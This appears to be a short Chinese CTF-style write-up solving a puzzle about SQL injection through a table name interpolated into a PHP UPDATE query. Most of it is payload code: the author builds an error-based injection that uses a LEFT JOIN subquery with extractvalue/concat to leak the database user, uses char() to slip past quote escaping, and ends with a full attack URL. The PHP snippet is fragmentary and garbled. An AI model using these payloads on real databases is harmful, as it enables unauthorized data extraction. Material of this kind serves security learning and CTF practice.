p牛在群里面出了一个好玩的题目，正好晚上空虚寂寞冷，就做一下暖暖身子，题目是：

``````<?php

\$sql = "UPDATE `{\$table}`
WHERE id=1";
}
``````

``````UPDATE student D
LEFT JOIN (SELECT
B.studentId,
SUM(B.score) AS s_sum,
ROUND(AVG(B.score),1) AS s_avg
FROM score B
WHERE b.examTime >= '2015-03-10'
GROUP BY B.studentId) C
ON (C.studentId = D.id)

SET D.score_sum = c.s_sum,
D.score_avg = c.s_avg
WHERE D.id =
(
SELECT
E.id FROM
(
SELECT
DISTINCT a.studentId AS id
FROM score A
WHERE A.examTime >= '2015-03-10'
) E
WHERE E.id = D.id
)
AND d.age = 1;
``````

``````update `table` t left join (select id from `table`) tt on tt.user=t.username set username ='admin' where id=1;
``````

``````update `table` t left join (select ‘1’ as user from dual) tt on tt.user=t.username set username ='admin' where id=1;
``````

``````table` t left join (select '1' as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=t.username
``````

``````update `table` t left join (select \‘1\’ as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=t.username`
where id=1
``````

``````http://localhost/code.php?table=table` t left join (select char(97) as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=`t.username
``````

``````update `table` t left join (select char(97) as user from dual where (extractvalue(1,concat(0x7e,(select user()),0x7e)))) tt on tt.user=`t.username`